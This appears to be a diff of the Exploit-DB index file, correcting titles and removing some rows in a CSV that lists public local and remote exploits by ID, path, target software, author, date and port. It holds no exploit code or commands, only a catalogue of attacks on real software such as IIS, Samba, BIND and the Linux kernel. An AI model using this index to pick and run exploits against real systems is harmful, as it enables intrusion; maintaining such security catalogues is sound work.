29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6/011.1 - Path Arbitrary Code Execution",2007-05-07,"Arnaud Giersch",linux,local,0 30007,platforms/windows/local/30007.txt,"Notepad++ Plugin Notepad 1.5 - Local Overflow",2013-12-03,"Junwen Sun",windows,local,0 30096,platforms/osx/local/30096.txt,"Apple Mac OSX 10.4.9 - VPND Local Format String",2007-05-29,"Chris Anley",osx,local,0 @@ -8894,7 +8911,7 @@ id,file,description,date,author,platform,type,port 38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - Crawl Website Buffer Overflow",2015-11-02,MandawCoder,windows,local,0 38601,platforms/windows/local/38601.py,"Sam Spade 1.14 - Scan Addresses Buffer Overflow",2015-11-02,VIKRAMADITYA,windows,local,0 38603,platforms/windows/local/38603.py,"TCPing 2.1.0 - Buffer Overflow",2015-11-02,hyp3rlinx,windows,local,0 -38609,platforms/windows/local/38609.py,"Gold MP4 Player - '.swf' Local",2015-11-03,"Vivek Mahajan",windows,local,0 +38609,platforms/windows/local/38609.py,"Gold MP4 Player - '.swf' Local Overflow",2015-11-03,"Vivek Mahajan",windows,local,0 38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention - Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0 38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption - Information Disclosure",2013-07-09,"Brad Antoniewicz",windows,local,0 38672,platforms/windows/local/38672.txt,"YardRadius - Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0 @@ -9203,7 +9220,7 @@ id,file,description,date,author,platform,type,port 41754,platforms/hardware/local/41754.txt,"Intermec PM43 Industrial Printer - Privilege Escalation",2017-03-28,"Jean-Marie Bourbon",hardware,local,0 41760,platforms/linux/local/41760.txt,"Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation",2016-02-22,halfdog,linux,local,0 41761,platforms/linux/local/41761.txt,"AUFS (Ubuntu 15.10) - 'allow_userns' Fuse/Xattr User Namespaces Privilege Escalation",2016-02-19,halfdog,linux,local,0 -41762,platforms/linux/local/41762.txt,"Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr Setgid Privilege Escalation",2016-11-22,halfdog,linux,local,0 +41762,platforms/linux/local/41762.txt,"Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr SetGID Privilege Escalation",2016-11-22,halfdog,linux,local,0 41763,platforms/linux/local/41763.txt,"Ubuntu 15.10 - 'USERNS ' Overlayfs Over Fuse Privilege Escalation",2016-11-22,halfdog,linux,local,0 41764,platforms/linux/local/41764.txt,"NTP - Privilege Escalation",2016-01-21,halfdog,linux,local,0 41765,platforms/linux/local/41765.txt,"Ubuntu 15.04 (Development) - 'Upstart' Logrotation Privilege Escalation",2015-03-12,halfdog,linux,local,0 @@ -9265,7 +9282,7 @@ id,file,description,date,author,platform,type,port 42267,platforms/windows/local/42267.py,"Easy File Sharing Web Server 7.2 - Account Import Local Buffer Overflow (SEH)",2017-06-28,Chako,windows,local,0 42270,platforms/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",solaris_x86,local,0 42271,platforms/openbsd/local/42271.c,"OpenBSD - 'at Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",openbsd,local,0 -42273,platforms/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib Stack Clash'",2017-06-28,"Qualys Corporation",lin_x86,local,0 +42273,platforms/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib' Stack Clash",2017-06-28,"Qualys Corporation",lin_x86,local,0 42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0 42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 @@ -9338,16 +9355,16 @@ id,file,description,date,author,platform,type,port 43139,platforms/windows/local/43139.c,"IKARUS anti.virus 2.16.7 - 'ntguard_x64' Privilege Escalation",2017-11-13,"Parvez Anwar",windows,local,0 43156,platforms/windows/local/43156.py,"VX Search 10.2.14 - 'Proxy' Buffer Overflow (SEH)",2017-11-16,wetw0rk,windows,local,0 43162,platforms/windows/local/43162.txt,"Microsoft Windows 10 - CiSetFileCache TOCTOU Security Feature Bypass",2017-11-20,"Google Security Research",windows,local,0 -1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote",2003-03-23,kralor,windows,remote,80 +1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 -5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote",2003-04-03,"Marcin Wolak",windows,remote,139 +5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",windows,remote,139 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0 10,platforms/multiple/remote/10.c,"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",2003-04-10,eSDee,multiple,remote,139 16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,linux,remote,1723 18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,linux,remote,0 19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,linux,remote,1723 -20,platforms/windows/remote/20.txt,"Microsoft Windows 2000/XP - SMB Authentication Remote",2003-04-25,"Haamed Gheibi",windows,remote,139 +20,platforms/windows/remote/20.txt,"Microsoft Windows 2000/XP - SMB Authentication Remote Overflow",2003-04-25,"Haamed Gheibi",windows,remote,139 23,platforms/windows/remote/23.c,"RealServer < 8.0.2 (Windows Platforms) - Remote Overflow",2003-04-30,"Johnny Cyberpunk",windows,remote,554 24,platforms/linux/remote/24.c,"Sendmail 8.12.8 (BSD) - 'Prescan()' Remote Command Execution",2003-04-30,bysin,linux,remote,25 25,platforms/linux/remote/25.c,"OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",linux,remote,0 @@ -9359,12 +9376,11 @@ id,file,description,date,author,platform,type,port 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution",2003-05-29,anonymous,linux,remote,80 36,platforms/windows/remote/36.c,"Microsoft Windows - WebDAV Remote Code Execution (2)",2003-06-01,alumni,windows,remote,80 37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag (MS03-020)",2003-06-07,alumni,windows,remote,0 -38,platforms/linux/remote/38.pl,"Apache 2.0.45 - 'APR' Remote",2003-06-08,"Matthew Murphy",linux,remote,80 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,linux,remote,69 41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,linux,remote,80 42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 Build 0402 - Remote Format String",2003-06-11,ThreaT,windows,remote,25 43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21 -45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote",2003-06-23,Rave,windows,remote,80 +45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Overflow",2003-06-23,Rave,windows,remote,80 46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow",2003-06-27,B-r00t,linux,remote,25 48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote (MS03-022)",2003-07-01,firew0rker,windows,remote,80 49,platforms/linux/remote/49.c,"eXtremail 1.5.x (Linux) - Remote Format Strings",2003-07-02,B-r00t,linux,remote,25 @@ -9372,9 +9388,9 @@ id,file,description,date,author,platform,type,port 51,platforms/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 54,platforms/windows/remote/54.c,"LeapWare LeapFTP 2.7.x - Remote Buffer Overflow",2003-07-12,drG4njubas,windows,remote,21 55,platforms/linux/remote/55.c,"Samba 2.2.8 - Brute Force Method Remote Command Execution",2003-07-13,Schizoprenic,linux,remote,139 -56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - 'nsiislog.dll' Remote",2003-07-14,anonymous,windows,remote,80 +56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - 'nsiislog.dll' Remote Overflow",2003-07-14,anonymous,windows,remote,80 57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - 'TTYPROMPT in.telnet' Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0 -58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote",2003-07-17,"Carl Livitt",linux,remote,504 +58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Overflow",2003-07-17,"Carl Livitt",linux,remote,504 63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - GID Remote Code Execution",2003-07-25,"the itch",linux,remote,1114 64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135 66,platforms/windows/remote/66.c,"Microsoft Windows XP/2000 - 'RPC DCOM' Remote (MS03-026)",2003-07-26,"H D Moore",windows,remote,135 @@ -9408,13 +9424,13 @@ id,file,description,date,author,platform,type,port 109,platforms/windows/remote/109.c,"Microsoft Windows - 'RPC2' Universal / Denial of Service (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135 110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force",2003-10-13,Haggis,linux,remote,21 112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,windows,remote,0 -116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote",2003-11-04,xCrZx,windows,remote,515 +116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Overflow",2003-11-04,xCrZx,windows,remote,515 117,platforms/windows/remote/117.c,"Microsoft Windows XP/2000 - RPC Remote Non Exec Memory",2003-11-07,ins1der,windows,remote,135 119,platforms/windows/remote/119.c,"Microsoft Windows XP/2000 - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0 121,platforms/windows/remote/121.c,"Microsoft FrontPage Server Extensions - 'fp30reg.dll' (MS03-051)",2003-11-13,Adik,windows,remote,80 123,platforms/windows/remote/123.c,"Microsoft Windows - Workstation Service WKSSVC Remote (MS03-049)",2003-11-14,snooq,windows,remote,0 -124,platforms/windows/remote/124.pl,"IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote",2003-11-19,"Peter Winter-Smith",windows,remote,80 -126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote",2003-11-20,xCrZx,linux,remote,80 +124,platforms/windows/remote/124.pl,"IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Overflow",2003-11-19,"Peter Winter-Smith",windows,remote,80 +126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Overflow",2003-11-20,xCrZx,linux,remote,80 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution (WebServer)",2003-11-22,nesumin,windows,remote,0 130,platforms/windows/remote/130.c,"Microsoft Windows XP - Workstation Service Remote (MS03-049)",2003-12-04,fiNis,windows,remote,0 132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure",2003-12-06,m00,linux,remote,80 @@ -9423,7 +9439,7 @@ id,file,description,date,author,platform,type,port 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal",2003-12-18,kralor,windows,remote,80 139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - 'abook_dbname' Remote Code Execution",2003-12-27,SpikE,linux,remote,406 143,platforms/linux/remote/143.c,"lftp 2.6.9 - Remote Stack based Overflow",2004-01-14,Li0n7,linux,remote,0 -149,platforms/windows/remote/149.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote",2004-01-27,lion,windows,remote,21 +149,platforms/windows/remote/149.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow",2004-01-27,lion,windows,remote,21 151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0 155,platforms/windows/remote/155.c,"Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow",2004-02-26,kralor,windows,remote,3128 156,platforms/windows/remote/156.c,"PSOProxy 0.91 (Windows 2000/XP) - Remote Buffer Overflow",2004-02-26,Rave,windows,remote,8080 @@ -9448,7 +9464,7 @@ id,file,description,date,author,platform,type,port 192,platforms/windows/remote/192.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (8)",2000-11-18,"Roelof Temmingh",windows,remote,80 201,platforms/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,multiple,remote,21 204,platforms/linux/remote/204.c,"BFTPd - 'vsprintf()' Format Strings",2000-11-29,DiGiT,linux,remote,21 -208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Overflow",2000-11-30,"Babcia Padlina",linux,remote,119 +208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Remote Overflow",2000-11-30,"Babcia Padlina",linux,remote,119 211,platforms/cgi/remote/211.c,"PHF (Linux/x86) - Buffer Overflow",2000-12-01,proton,cgi,remote,0 213,platforms/solaris/remote/213.c,"Solaris sadmind - Remote Buffer Overflow",2000-12-01,Optyx,solaris,remote,111 220,platforms/linux/remote/220.c,"PHP 3.0.16/4.0.2 - Remote Format Overflow",2000-12-06,Gneisenau,linux,remote,80 @@ -9458,7 +9474,7 @@ id,file,description,date,author,platform,type,port 228,platforms/bsd/remote/228.c,"Oops! 1.4.6 - one russi4n proxy-server Heap Buffer Overflow",2000-12-15,diman,bsd,remote,3128 230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Command Execution",2000-12-15,VeNoMouS,linux,remote,515 232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass",2000-12-19,anonymous,windows,remote,0 -234,platforms/bsd/remote/234.c,"OpenBSD ftpd 2.6/2.7 - Remote",2000-12-20,Scrippie,bsd,remote,21 +234,platforms/bsd/remote/234.c,"OpenBSD ftpd 2.6/2.7 - Remote Overflow",2000-12-20,Scrippie,bsd,remote,21 237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - TCP/IP Weakness Spoof IP",2001-01-02,Stealth,linux,remote,513 239,platforms/solaris/remote/239.c,"WU-FTPD 2.6.0 - Remote Format Strings",2001-01-03,kalou,solaris,remote,21 253,platforms/linux/remote/253.pl,"IMAP4rev1 10.190 - Authentication Stack Overflow",2001-01-19,teleh0r,linux,remote,143 @@ -9472,7 +9488,7 @@ id,file,description,date,author,platform,type,port 279,platforms/linux/remote/279.c,"ISC BIND 8.2.x - 'TSIG' Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53 280,platforms/solaris/remote/280.c,"ISC BIND 8.2.x - 'TSIG' Stack Overflow (3)",2001-03-01,LSD-PLaNET,solaris,remote,53 282,platforms/linux/remote/282.c,"ISC BIND 8.2.x - 'TSIG' Stack Overflow (4)",2001-03-02,multiple,linux,remote,53 -284,platforms/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - 'lsub' Remote",2001-03-03,SkyLaZarT,linux,remote,143 +284,platforms/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - 'lsub' Remote Overflow",2001-03-03,SkyLaZarT,linux,remote,143 293,platforms/windows/remote/293.c,"Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)",2004-04-24,sbaa,windows,remote,445 294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - 'connectedNodes.ovpl' Remote Code Execution",2004-04-28,FX,hardware,remote,8000 295,platforms/windows/remote/295.c,"Microsoft Windows XP/2000 - 'Lsasrv.dll' Remote Universal (MS04-011)",2004-04-29,houseofdabus,windows,remote,445 @@ -9481,7 +9497,7 @@ id,file,description,date,author,platform,type,port 300,platforms/multiple/remote/300.c,"CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401 301,platforms/solaris/remote/301.c,"CVS - Remote Entry Line Root Heap Overflow",2004-06-25,anonymous,solaris,remote,2401 303,platforms/linux/remote/303.pl,"Borland Interbase 7.x - Remote Buffer Overflow",2004-06-25,"Aviram Jenik",linux,remote,3050 -304,platforms/linux/remote/304.c,"Subversion 1.0.2 - 'svn_time_from_cstring()' Remote",2004-06-25,"Gyan Chawdhary",linux,remote,3690 +304,platforms/linux/remote/304.c,"Subversion 1.0.2 - 'svn_time_from_cstring()' Remote Overflow",2004-06-25,"Gyan Chawdhary",linux,remote,3690 307,platforms/linux/remote/307.py,"Rlpr 2.04 - 'msg()' Remote Format String",2004-06-25,jaguar,linux,remote,7290 308,platforms/linux/remote/308.c,"MPlayer 1.0pre4 GUI - Filename handling Overflow",2004-07-04,c0ntex,linux,remote,0 310,platforms/windows/remote/310.txt,"Microsoft Internet Explorer - Remote Application.Shell",2004-07-09,Jelmer,windows,remote,0 @@ -9497,7 +9513,7 @@ id,file,description,date,author,platform,type,port 359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta - 'drcatd' Remote Code Execution",2004-07-22,Taif,linux,remote,3535 361,platforms/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote,0 364,platforms/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901 -372,platforms/linux/remote/372.c,"OpenFTPd 0.30.2 - Remote",2004-08-03,Andi,linux,remote,21 +372,platforms/linux/remote/372.c,"OpenFTPd 0.30.2 - Remote Overflow",2004-08-03,Andi,linux,remote,21 373,platforms/linux/remote/373.c,"OpenFTPd 0.30.1 - message system Remote Shell",2004-08-04,infamous41md,linux,remote,21 378,platforms/windows/remote/378.pl,"BlackJumboDog FTP Server - Remote Buffer Overflow",2004-08-05,"Tal Zeltzer",windows,remote,21 379,platforms/linux/remote/379.txt,"CVSTrac - Arbitrary Code Execution",2004-08-06,anonymous,linux,remote,0 @@ -9509,12 +9525,11 @@ id,file,description,date,author,platform,type,port 390,platforms/linux/remote/390.c,"GV PostScript Viewer - Remote Buffer Overflow (1)",2004-08-13,infamous41md,linux,remote,0 391,platforms/osx/remote/391.pl,"Apple Mac OSX 10.3.3 - AppleFileServer Overflow Remote Code Execution",2004-08-13,"Dino Dai Zovi",osx,remote,548 392,platforms/linux/remote/392.c,"Remote CVS 1.11.15 - 'error_prog_name' Arbitrary Code Execution",2004-08-13,"Gyan Chawdhary",linux,remote,2401 -397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) - Remote",2002-06-25,Teso,linux,remote,143 +397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) - Remote Overflow",2002-06-25,Teso,linux,remote,143 398,platforms/linux/remote/398.c,"rsync 2.5.1 - Remote (1)",2002-01-01,Teso,linux,remote,873 399,platforms/linux/remote/399.c,"rsync 2.5.1 - Remote (2)",2002-01-01,Teso,linux,remote,873 400,platforms/linux/remote/400.c,"GV PostScript Viewer - Remote Buffer Overflow (2)",2004-08-18,infamous41md,linux,remote,0 404,platforms/linux/remote/404.pl,"PlaySms 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0 -405,platforms/linux/remote/405.c,"XV 3.x - '.BMP' Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,remote,0 408,platforms/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0 409,platforms/bsd/remote/409.c,"BSD - 'TelnetD' Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23 413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / '/etc/shadow' Stealer (2)",2004-08-24,Tal0n,linux,remote,0 @@ -9570,7 +9585,7 @@ id,file,description,date,author,platform,type,port 652,platforms/linux/remote/652.c,"Prozilla 1.3.6 - Remote Stack Overflow",2004-11-23,"Serkan Akpolat",linux,remote,8080 654,platforms/windows/remote/654.c,"Winamp 5.06 - 'IN_CDDA.dll' Remote Buffer Overflow",2004-11-24,k-otik,windows,remote,0 658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP 1.52 - Remote Buffer Overflow",2004-11-25,class101,windows,remote,143 -660,platforms/linux/remote/660.c,"PHP 4.3.7/5.0.0RC3 - memory_limit Remote",2004-11-27,"Gyan Chawdhary",linux,remote,80 +660,platforms/linux/remote/660.c,"PHP 4.3.7/5.0.0RC3 - 'memory_limit' Remote Overflow",2004-11-27,"Gyan Chawdhary",linux,remote,80 663,platforms/windows/remote/663.py,"Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)",2004-11-29,muts,windows,remote,143 668,platforms/windows/remote/668.c,"Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (1)",2004-11-30,JohnH,windows,remote,143 670,platforms/windows/remote/670.c,"Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143 @@ -9580,7 +9595,7 @@ id,file,description,date,author,platform,type,port 693,platforms/windows/remote/693.c,"Ability Server 2.34 - Remote APPE Buffer Overflow",2004-12-16,darkeagle,windows,remote,21 705,platforms/multiple/remote/705.pl,"Webmin - Brute Force / Command Execution",2004-12-22,Di42lo,multiple,remote,10000 711,platforms/windows/remote/711.c,"CrystalFTP Pro 2.8 - Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,21 -712,platforms/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 - Format String Remote",2004-12-23,pucik,linux,remote,8000 +712,platforms/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Overflow",2004-12-23,pucik,linux,remote,8000 716,platforms/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - '/bin/login' Buffer Overflow",2004-12-24,"Marco Ivaldi",solaris,remote,513 719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer (Windows XP SP2) - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0 726,platforms/windows/remote/726.c,"Netcat 1.1 - '-e' Switch Remote Buffer Overflow",2004-12-26,class101,windows,remote,0 @@ -9592,7 +9607,6 @@ id,file,description,date,author,platform,type,port 746,platforms/multiple/remote/746.pl,"Webmin 1.5 - Brute Force / Command Execution",2005-01-08,ZzagorR,multiple,remote,10000 750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow",2005-01-11,class101,windows,remote,6101 753,platforms/windows/remote/753.html,"Microsoft Internet Explorer - '.ANI' Remote Stack Overflow (MS05-002) (2)",2005-01-12,Skylined,windows,remote,0 -758,platforms/osx/remote/758.c,"Apple iTunes - Playlist Parsing Local Buffer Overflow",2005-01-16,nemo,osx,remote,0 759,platforms/windows/remote/759.cpp,"Apple iTunes - Playlist Buffer Overflow Download Shellcode",2005-01-16,ATmaCA,windows,remote,0 761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162 764,platforms/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow",2003-04-04,spabam,unix,remote,80 @@ -9604,7 +9618,7 @@ id,file,description,date,author,platform,type,port 784,platforms/linux/remote/784.c,"ngIRCd 0.8.2 - Remote Format String",2005-02-03,CoKi,linux,remote,6667 785,platforms/linux/remote/785.c,"Newspost 2.1 - 'socket_getline()' Remote Buffer Overflow (2)",2005-02-03,cybertronic,linux,remote,119 787,platforms/windows/remote/787.pl,"Savant Web Server 3.1 (Windows 2003) - Remote Buffer Overflow",2005-02-04,CorryL,windows,remote,80 -794,platforms/windows/remote/794.c,"3CServer 1.1 (FTP Server) - Remote",2005-02-07,mandragore,windows,remote,21 +794,platforms/windows/remote/794.c,"3CServer 1.1 (FTP Server) - Remote Overflow",2005-02-07,mandragore,windows,remote,21 802,platforms/windows/remote/802.cpp,"MSN Messenger - '.png' Image Buffer Overflow Download Shellcode",2005-02-09,ATmaCA,windows,remote,0 804,platforms/windows/remote/804.c,"MSN Messenger (Linux) - '.png' Image Buffer Overflow",2005-02-09,dgr,windows,remote,0 805,platforms/multiple/remote/805.c,"ELOG 2.5.6 - Remote Shell",2005-02-09,n4rk0tix,multiple,remote,8080 @@ -9618,7 +9632,7 @@ id,file,description,date,author,platform,type,port 827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP - Unauthorized 'USER' Remote Buffer Overflow",2005-02-18,class101,windows,remote,21 828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Code Execution",2005-02-18,"John Doe",multiple,remote,617 829,platforms/hardware/remote/829.c,"Thomson TCW690 - POST Password Validation",2005-02-19,MurDoK,hardware,remote,80 -830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 (Windows) - File Request Format String Remote",2005-02-19,mandragore,windows,remote,8000 +830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 (Windows) - File Request Format String Remote Overflow",2005-02-19,mandragore,windows,remote,8000 831,platforms/linux/remote/831.c,"GNU Cfengine 2.17p1 - RSA Authentication Heap Overflow",2005-02-20,jsk,linux,remote,5803 845,platforms/windows/remote/845.c,"BadBlue 2.5 - Easy File Sharing Remote Buffer Overflow",2005-02-27,class101,windows,remote,80 847,platforms/windows/remote/847.cpp,"BadBlue 2.55 - Web Server Remote Buffer Overflow",2005-02-27,tarako,windows,remote,80 @@ -9627,14 +9641,14 @@ id,file,description,date,author,platform,type,port 868,platforms/windows/remote/868.cpp,"Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,windows,remote,0 875,platforms/windows/remote/875.c,"Sentinel LM 7.x - UDP License Service Remote Buffer Overflow",2005-03-13,class101,windows,remote,5093 878,platforms/linux/remote/878.c,"Ethereal 0.10.9 (Linux) - '3G-A11' Remote Buffer Overflow",2005-03-14,"Diego Giagio",linux,remote,0 -879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - 'GET' Remote",2005-03-14,lammat,multiple,remote,0 +879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - 'GET' Remote File Read",2005-03-14,lammat,multiple,remote,0 883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,windows,remote,2380 900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Heap Overflow",2005-03-28,infamous41md,linux,remote,25 902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Code Execution",2005-03-29,darkeagle,linux,remote,21 -903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 < 2.2.8 - 'imapmagicplus' Remote",2005-03-29,crash-x,linux,remote,143 +903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 < 2.2.8 - 'imapmagicplus' Remote Overflow",2005-03-29,crash-x,linux,remote,143 906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)",2005-04-01,class101,windows,remote,20031 909,platforms/windows/remote/909.cpp,"Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)",2005-04-12,class101,windows,remote,42 -915,platforms/linux/remote/915.c,"MailEnable Enterprise 1.x - IMAPd Remote",2005-04-05,Expanders,linux,remote,143 +915,platforms/linux/remote/915.c,"MailEnable Enterprise 1.x - IMAPd Remote Overflow",2005-04-05,Expanders,linux,remote,143 930,platforms/windows/remote/930.html,"Microsoft Internet Explorer - DHTML Object Memory Corruption",2005-04-12,Skylined,windows,remote,0 934,platforms/linux/remote/934.c,"gld 1.4 - Postfix Greylisting Daemon Remote Format String",2005-04-13,Xpl017Elz,linux,remote,2525 